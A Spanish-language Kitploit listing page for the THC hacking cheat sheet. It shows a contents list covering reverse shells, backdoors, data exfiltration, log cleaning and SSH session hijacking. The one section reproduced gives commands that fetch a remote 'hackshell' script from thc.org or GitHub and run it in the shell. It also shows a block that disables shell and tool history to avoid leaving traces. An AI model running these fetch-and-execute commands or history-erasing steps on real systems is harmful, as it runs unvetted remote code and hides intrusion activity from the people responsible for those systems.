Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Varios consejos y trucos | Kitploit
Herramientas/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Inteligencia de Fuentes Abiertas)Mecanismos de PersistenciaMovimiento LateralExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingRecursos Curados

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Desarrollo de Payloads
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Varios consejos y trucos

Ver Repositorio
3.9k47150hace 3 mesesRevisado por Kitploit

Los consejos, trucos y hacks favoritos de THC (Hoja de referencia)

https://thc.org/tips

Una colección de nuestros trucos favoritos. Muchos de esos trucos no son nuestros. Simplemente los recopilamos.

Mostramos los trucos 'tal cual' sin ninguna explicación de por qué funcionan. Necesitas conocer Linux para entender cómo y por qué funcionan.

¿Tienes trucos? Únete a nosotros https://thc.org/ops

  1. Bash
    1. Configurar un Hack Shell
    2. Ocultar tus comandos
    3. Ocultar las opciones de tu línea de comandos
    4. Ocultar una conexión de red
    5. Ocultar un proceso como usuario
    6. Ocultar un proceso como root
    7. Ocultar scripts
    8. Ocultarse de cat
    9. Ejecutar en paralelo con archivos de log separados
  2. SSH
    1. SSH casi invisible
    2. Múltiples shells mediante 1 conexión SSH/TCP
    3. Túnel SSH
    4. Túnel SSH socks5
    5. SSH a un host detrás de NAT
    6. Pivote SSH mediante ProxyJump
    7. SSHD como usuario
  3. Red
    1. Descubrir hosts
    2. Tcpdump
    3. Túnel y reenvío
      1. Puertos inversos TCP crudos
      2. Reenvíos inversos HTTPS
      3. Rebotar tráfico con iptables
      4. IP fantasma / Suplantación de IP
      5. Varios
    4. Usar cualquier herramienta mediante un proxy SOCKS
    5. Encontrar tu dirección IP pública
    6. Comprobar accesibilidad desde todo el mundo
    7. Comprobar/Escanear puertos abiertos
    8. Romper hashes de contraseñas
    9. Fuerza bruta de contraseñas / claves
  4. Subida/Descarga/Exfiltración de datos
    1. Codificación/Decodificación de archivos
    2. Transferencia de archivos con cortar y pegar
    3. Transferencia de archivos con tmux
    4. Transferencia de archivos con screen
    5. Transferencia de archivos con gs-netcat y sftp
    6. Transferencia de archivos con HTTP
    7. Descarga de archivos sin curl
    8. Transferencia de archivos con rsync
    9. Transferencia de archivos a sitios públicos de volcado
    10. Transferencia de archivos con WebDAV
    11. Transferencia de archivos a Telegram
  5. Reverse Shell / Shell tonta
    1. Reverse Shells
      1. con gs-netcat (cifrado)
      2. con Bash
      3. con cURL (cifrado)
      4. con cURL (texto claro)
      5. con OpenSSL (cifrado)
      6. con remote.moe (cifrado)
      7. sin /dev/tcp
      8. con Python
      9. con Perl
      10. con PHP
    2. Mejorar la shell tonta
      1. Mejorar una reverse shell a una shell pty
      2. Mejorar una reverse shell a una shell totalmente interactiva
      3. Reverse shell con socat (totalmente interactiva)
  6. Puertas traseras
    1. gs-netcat
    2. sshx.io
    3. La puerta trasera SSHD más pequeña
    4. Acceso remoto a toda una red
    5. La puerta trasera PHP más pequeña
    6. La puerta trasera con túnel DNS inverso más pequeña
    7. Puerta trasera de root local
    8. Implante autoextraíble
  7. Reconocimiento de host
  8. Trucos de shell
    1. Destruir archivos (borrado seguro)
    2. Restaurar la fecha de un archivo
    3. Limpiar archivo de log
    4. Ocultar archivos a un usuario sin privilegios de root
    5. Hacer un archivo inmutable
    6. Cambiar de usuario sin sudo/su
    7. Ofuscar y cifrar payload
    8. Desplegar una puerta trasera sin tocar el sistema de archivos
  9. Criptografía
    1. Generar rápidamente una contraseña aleatoria
    2. Sistemas de archivos cifrados transportables en Linux
      1. cryptsetup
      2. EncFS
    3. Cifrar un archivo
  10. Sniffing y secuestro de sesiones
    1. Snifar la sesión SHELL de un usuario
    2. Snifar todas las sesiones SHELL con dtrace
    3. Snifar todas las sesiones SHELL con eBPF
    4. Snifar la sesión SSH o SSHD de un usuario con strace
    5. Snifar la sesión SSH saliente de un usuario con un script wrapper
    6. Snifar la sesión SSH saliente de un usuario con SSH-IT
    7. Secuestrar / tomar el control de una sesión SSH en ejecución
  11. VPN y shells
    1. Servidores root desechables
    2. Proveedores de VPN/VPS
  12. Recopilación de inteligencia OSINT
  13. Varios
    1. Herramientas del oficio
    2. Comandos Linux geniales
    3. Hoja de referencia de tmux
    4. Comandos útiles
  14. Cómo convertirse en hacker
  15. Otros sitios

1. Bash / Shell

1.i. Configurar un Hack Shell (bash):

Haz que BASH sea menos ruidoso. Desactiva ~/.bash_history y muchas otras cosas.```sh source <(curl -SsfL https://thc.org/hs)

URL alternativa:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Y si no hay curl/wget, usa surl y el curl (temporalmente) instalado con bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell hace mucho más, pero lo más importante es esto:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"
Descargar herramienta